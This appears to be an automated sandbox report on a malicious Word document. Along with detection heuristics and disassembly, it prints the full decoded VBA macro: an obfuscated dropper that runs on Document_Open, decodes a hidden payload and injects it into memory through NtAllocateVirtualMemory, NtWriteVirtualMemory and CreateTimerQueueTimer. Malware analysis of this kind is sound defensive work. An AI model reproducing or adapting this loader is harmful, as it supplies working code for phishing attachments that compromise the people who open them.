MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro within the Document_Open subroutine, which is a common technique for initial execution. The macro appears to be obfuscated and uses a call to 'NtAllocateVirtualMemory' via PtrSafe declaration, suggesting it aims to allocate memory for and execute a payload. The ClamAV detection 'Doc.Dropper.Agent-6436876-0' further supports its malicious nature as a dropper. The document body content is benign, indicating the malicious functionality is solely within the macro.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6436876-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6436876-0
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
Attempted x86 opcode disassembly0000740D 40 inc eax 0000740E 40 inc eax 0000740F 40 inc eax 00007410 40 inc eax 00007411 40 inc eax 00007412 40 inc eax 00007413 40 inc eax 00007414 40 inc eax 00007415 40 inc eax 00007416 40 inc eax 00007417 40 inc eax 00007418 40 inc eax 00007419 40 inc eax 0000741A 40 inc eax 0000741B 40 inc eax 0000741C 40 inc eax 0000741D 40 inc eax 0000741E 40 inc eax 0000741F 40 inc eax 00007420 40 inc eax 00007421 40 inc eax 00007422 40 inc eax 00007423 40 inc eax 00007424 40 inc eax 00007425 40 inc eax 00007426 40 inc eax 00007427 40 inc eax 00007428 40 inc eax 00007429 40 inc eax 0000742A 40 inc eax 0000742B 40 inc eax 0000742C 40 inc eax 0000742D 40 inc eax 0000742E 40 inc eax 0000742F 40 inc eax 00007430 40 inc eax 00007431 40 inc eax 00007432 40 inc eax 00007433 40 inc eax 00007434 40 inc eax 00007435 40 inc eax 00007436 40 inc eax 00007437 40 inc eax 00007438 40 inc eax 00007439 40 inc eax 0000743A 40 inc eax 0000743B 40 inc eax 0000743C 40 inc eax 0000743D 40 inc eax 0000743E 40 inc eax 0000743F 40 inc eax 00007440 40 inc eax 00007441 40 inc eax 00007442 40 inc eax 00007443 40 inc eax 00007444 40 inc eax 00007445 40 inc eax 00007446 40 inc eax 00007447 40 inc eax 00007448 40 inc eax 00007449 40 inc eax 0000744A 40 inc eax 0000744B 40 inc eax 0000744C 40 inc eax 0000744D 40 inc eax 0000744E 40 inc eax 0000744F 40 inc eax 00007450 40 inc eax 00007451 40 inc eax 00007452 40 inc eax 00007453 40 inc eax 00007454 40 inc eax 00007455 40 inc eax 00007456 40 inc eax 00007457 40 inc eax 00007458 40 inc eax 00007459 40 inc eax 0000745A 40 inc eax 0000745B 40 inc eax 0000745C 40 inc eax 0000745D 40 inc eax 0000745E 40 inc eax 0000745F 40 inc eax 00007460 40 inc eax 00007461 40 inc eax 00007462 40 inc eax 00007463 40 inc eax 00007464 40 inc eax 00007465 40 inc eax 00007466 40 inc eax 00007467 40 inc eax 00007468 40 inc eax 00007469 40 inc eax 0000746A 40 inc eax 0000746B 40 inc eax 0000746C 40 inc eax
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() chopper = "hercules" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11273 bytes |
SHA-256: e740c6c0b23fdb8b8d88ff84528db326cb672df0d8c0ac6f6568ec828b07087a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
chopper = "hercules"
bedding
reclusion = 28 + 10
Pmt 0, reclusion, 20522, 59196, 2
End Sub
Attribute VB_Name = "dimocarpus"
Attribute VB_Base = "0{3608F65F-2715-4212-85E5-29E34707BB97}{5FFAB0FC-1943-4D49-BD5C-D494ACC8D692}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "confining"
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function prelacy _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (copper As LongPtr, aether As LongPtr, ByVal chamaeleontidae As LongPtr, catByVal As LongPtr, ruptiliocarpon As LongPtr, ByVal argali As LongPtr) As LongPtr
#End If
Function manta(almost) As String
Dim ifla(63) As Long
Dim fossils As Long
Dim absolver As Long
Dim bromelia() As Byte
Dim exhibitionism As Long
Dim beaugregory As Long
Dim antihypertensive(63) As Long
Dim supplant As String
Dim approximative(63) As Long
Dim ungoverned(6962) As Byte
gradient = 30 - 10 + 4012
Dim annals As Long
scion = 78 - 93 + 65295
gangster = 27 - 24 + 253
introject = 71 - 76 + 69
Dim panini As Variant
bedside = 31 - 74 + 16711723
oberon = 123 - 107 + 16515056
autobiography = 101 - 36 + 257983
Dim barbiturate As Integer
hamiform = 13 - 41 + 4124
drippy = 44 - 51 + 262151
outlier = 49 - 111 + 317
flinch = 14 - 70 + 65592
cagily = 113 - 22 - 28
Dim copartner As Integer
futon = 8 - 49 + 7884
Dim mf() As Byte
mf = VBA.StrConv(almost, 120 + 8)
importer = 45 + 7
Pmt 0, importer, 25416, 25449, 7
affect = 7840 + 3
moneymaking = vbKeyShift - 12
For chordal = 0 To affect
If chordal Mod 2 = 0 Then
mf(chordal) = mf(chordal) - moneymaking
Else
mf(chordal) = mf(chordal) - (moneymaking - 1)
End If
Next chordal
boswellia = 58 + 16
Pmt 0, boswellia, 33800, 37708, 7
indulgency = unrestraint
For fossils = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
approximative(fossils) = admired(fossils, introject, 61)
antihypertensive(fossils) = admired(fossils, hamiform, 61)
ifla(fossils) = admired(fossils, drippy, 61)
Next fossils
salleamanger = 28 + 4
Pmt 0, salleamanger, 37442, 33315, 3
bromelia = mf
appeasable = 74 - 4 - 66
celiocentesis = 35 + 6
Pmt 0, celiocentesis, 32953, 31463, 7
expectable = 61 - 55 - 3
attendance = expectable + 1
bentley = 74 - 47 - 25
For absolver = 0 To affect
urnam = bromelia(absolver)
torah = bromelia(absolver + 2)
hold = antihypertensive(indulgency(bromelia(absolver + 1)))
namibian = approximative(indulgency(torah)) + indulgency(bromelia(absolver + expectable))
exhibitionism = ifla(indulgency(urnam)) + hold + namibian
fossils = admired(exhibitionism, bedside, 53)
ungoverned(beaugregory) = admired(fossils, flinch, 43)
fossils = admired(exhibitionism, scion, 53)
ungoverned(beaugregory + 1) = admired(fossils, gangster, 43)
ungoverned(beaugregory + bentley) = admired(exhibitionism, outlier, 53)
beaugregory = beaugregory + bentley + 1
absolver = absolver + 3
Next
manta = ungoverned
End Function
Attribute VB_Name = "dominis"
#If (2 - 59 + 457 + 82 - 79 + 297) > ((59 - 32 + 293) - (79 - 22 + 483) * 1) And Not ((47 - 59 + 40) - (75 - 44 - 3)) * 2 < (Win64) Then
Public Declare Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (soil As Any, ByVal calomel As Any, ByVal botany As Any, ByVal groundfish As Any, ByVal conserve As Any, ByVal euphoric As Any, ByVal catamaran As Any) As Long
#End If
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (odd As Any, ByVal rhoeadales As Any, ByVal gradeconstructed As Any, ByVal consumere As Any, ByVal naprapath As Any, ByVal aust As Any, ByVal acarina As Any) As Long
#End If
Function reposit(tempera, bearings, agriculturist)
Dim accidents As Long
Dim electronically As Integer
Dim desolately As Long
Dim separately As Integer
Dim coyly As Long
Dim unapparent As String
Dim ever As Long
Dim despitefully As Variant
Dim crenate As Long
Dim inaffable As String
Dim gharrywallah As Variant
dogtooth = dogtooth
dogtooth = costa
accidents = tempera
crenate = agriculturist
dogtooth = dogtooth
coyly = bearings
feast = 55 + 55
Pmt 0, feast, 26368, 10482, 5
foyer = Rnd(174)
desolately = 9 - 118 + 108
mercies ByVal desolately, _
accidents, coyly, _
crenate, ever
convertible = bracing + 121
End Function
Attribute VB_Name = "fixut"
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function mercies _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal alephnull As Any, ByVal alloyed As Any, ByVal bloom As Any, ByVal marker As Any, ByVal attenuated As Any) As LongPtr
#End If
Function admired(whimsicality, antigua, nulli)
If nulli = 43 + (10 / 2 - 5) Then
admired = whimsicality \ antigua
End If
If nulli = 53 + (5 - 3) / 2 - 1 Then
admired = whimsicality And antigua
End If
If nulli = 61 + (56 / 7 - 4 * 2) Then
admired = whimsicality * antigua
End If
End Function
Function nonsense(sequent, impact, dismantle)
Dim cofactor As Long
Dim kenyapithecus As Long
Dim maggior As LongPtr
Dim antacid As LongPtr
Dim odoriferous As LongPtr
Dim grid As Long
Dim magnetism As LongPtr
Dim monrovia As LongPtr
bracing = foyer And 408
dogtooth = dogtooth
antacid = sequent
monrovia = dismantle
convertible = convertible + 275
magnetism = impact
bootless = 3 + 60
Pmt 0, bootless, 19241, 16857, 4
dogtooth = dogtooth
maggior = 119 - 65 - 55
mercies ByVal maggior, _
antacid, magnetism, _
monrovia, odoriferous
costa = "appropinquation"
End Function
Function monism(ache)
Dim grnoematagr As Long
Dim amphibolite As Byte
Dim alteration As String
Dim cloudburst As Long
#If (119 - 44 + 325 + 42 - 114 + 372) > ((111 - 124 + 333) - (71 - 39 + 508) * 1) And ((41 - 34 + 21) - (72 - 33 - 11)) * 2 < (Win64) Then
Dim argument As Variant
Dim mindfulness As LongPtr
masaniello = 80 - 101 + 29
Dim anguilliformes As LongPtr
Dim wirehair As String
Dim caliver As Long
Dim uncomely As LongPtr
Dim belleslettres As Variant
emanate = VarPtr(mindfulness)
placoderm = nonsense(emanate, VarPtr(ache) + (62 - 20 - 34), masaniello)
#End If
#If (45 - 12 + 367 + 115 - 46 + 231) > ((44 - 56 + 332) - (126 - 53 + 467) * 1) And Not ((79 - 122 + 71) - (46 - 63 + 45)) * 2 < (Win64) Then
Dim mindfulness As Long
masaniello = 125 - 12 - 109
Dim anguilliformes As Long
Dim uncomely As Long
emanate = VarPtr(mindfulness)
placoderm = reposit(emanate, VarPtr(ache) + (91 - 2 - 81), masaniello)
#End If
groomed = 70 - 18 - 53
anguilliformes = 120 - 101 - 19
complaint = 22 - 108 + 86
uncomely = 61 - 91 + 10015
conditionally = 23 - 103 + 4176
fanon = 43 - 29 + 50
anthropology = prelacy(ByVal groomed, _
anguilliformes, ByVal complaint, uncomely, _
ByVal conditionally, ByVal fanon)
costa = dogtooth
dogtooth = "pilgarlic"
reposit anguilliformes, mindfulness, 67 - 89 + 5905
alarmism = 46 + 59
Pmt 0, alarmism, 3506, 33846, 5
monism = anguilliformes
End Function
Function bedding()
Dim gueridon As Variant
Dim nor As Variant
dimocarpus.cynocephalidae.Value = Day(#12/5/2013#)
varday = barrels = "jail"
aerobacter = allomorph
classicistic = "catchweed"
godship = heifer
dumfoundered = "omsk"
doubts = "prenticeship"
dastardly = involucre
Set metalepsis = dimocarpus.cynocephalidae.SelectedItem
adverb = 6 + 15
Pmt 0, adverb, 36937, 59909, 5
browbeaten = metalepsis.Name
nonpsychoactive = 23 - 121 + 7942
conciliation = Right(browbeaten, nonpsychoactive)
fogged = confining.manta(conciliation)
atkins = 31 + 54
Pmt 0, atkins, 30827, 16166, 5
leontocebus = "protrusive"
#If (76 - 18 + 342 + 45 - 33 + 288) > ((65 - 81 + 336) - (31 - 11 + 520) * 1) And ((32 - 72 + 68) - (36 - 60 + 52)) * 2 < (Win64) Then
Dim ladyinwaiting As String
Dim blastocyte As LongPtr
Dim hoax As LongPtr
Dim obediant As String
Dim stonechat As String
Dim fallaciousness As LongPtr
Dim demythologization As LongPtr
Dim render As LongPtr
abdominoscope = 8 - 42 + 2098
#ElseIf (106 - 90 + 384 + 3 - 46 + 343) > ((67 - 35 + 288) - (72 - 57 + 525) * 1) And Not ((95 - 75 + 8) - (114 - 21 - 65)) * 2 < (Win64) Then
Dim eileton As Variant
Dim hoax As Long
Dim signified As Long
Dim blastocyte As Long
Dim fallaciousness As Long
autoptical = 31 - 71 + 821
Dim demythologization As Long
Dim render As Long
abdominoscope = autoptical + 3459
#End If
diamondback = 94 - 116 + 22
thallophyte = "isotonic"
costal = 39 + 45
Pmt 0, costal, 11568, 42979, 3
venogram = "assistive"
seafood = "mpriser"
anothers = "marduk"
styrene = 36 + 39
Pmt 0, styrene, 33132, 35943, 4
etropus = fogged
chromatism = "broad"
blastocyte = monism(etropus)
abrasion = melancholic
efface = "macrobiotic"
Dim isospondyli As String
Dim postmeridian As Long
fallaciousness = 46 - 120 + 74
hoax = blastocyte + abdominoscope
demythologization = 30 - 82 + 201579
render = 37 - 106 + 3569
formonly = gaucherie(demythologization, _
fallaciousness, _
hoax, fallaciousness, _
fallaciousness, fallaciousness, _
fallaciousness)
dreary = 50 + 6
Pmt 0, dreary, 38704, 58330, 6
End Function
Attribute VB_Name = "mirtans"
#If (2 - 59 + 457 + 82 - 79 + 297) > ((59 - 32 + 293) - (79 - 22 + 483) * 1) And Not ((47 - 59 + 40) - (75 - 44 - 3)) * 2 < (Win64) Then
Public Declare Function prelacy _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (pretrial As Long, canonist As Long, ByVal segnity As Long, narrowedByVal As Long, crowned As Long, ByVal absinthe As Long) As Long
Public Declare Function mercies _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal plonk As Any, ByVal adamant As Any, ByVal sanctorum As Any, ByVal developer As Any, ByVal dead As Any) As Long
#End If
Function unrestraint()
Dim subjecta(255) As Byte
frostbound = 31 - 37 + 71
For i = frostbound To (57 - 78 + 112)
subjecta(frostbound) = frostbound - (127 - 53 - 9)
frostbound = frostbound + 1
If athanor > (48 - 5 + 48) Then Exit For
Next
frostbound = (86 - 20 - 18)
For i = frostbound To (65 - 82 + 75)
subjecta(frostbound) = frostbound + (78 - 125 + 51)
frostbound = frostbound + 1
If athanor > (55 - 120 + 123) Then Exit For
Next
frostbound = (68 - 47 + 76)
For i = frostbound To (13 - 99 + 209)
subjecta(frostbound) = frostbound - (77 - 115 + 109)
frostbound = frostbound + 1
If athanor > (53 - 117 + 187) Then Exit For
Next
subjecta(87 - 123 + 83) = (48 - 9 + 24)
frostbound = (68 - 31 + 6)
subjecta(frostbound) = (109 - 94 + 47)
unrestraint = subjecta
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.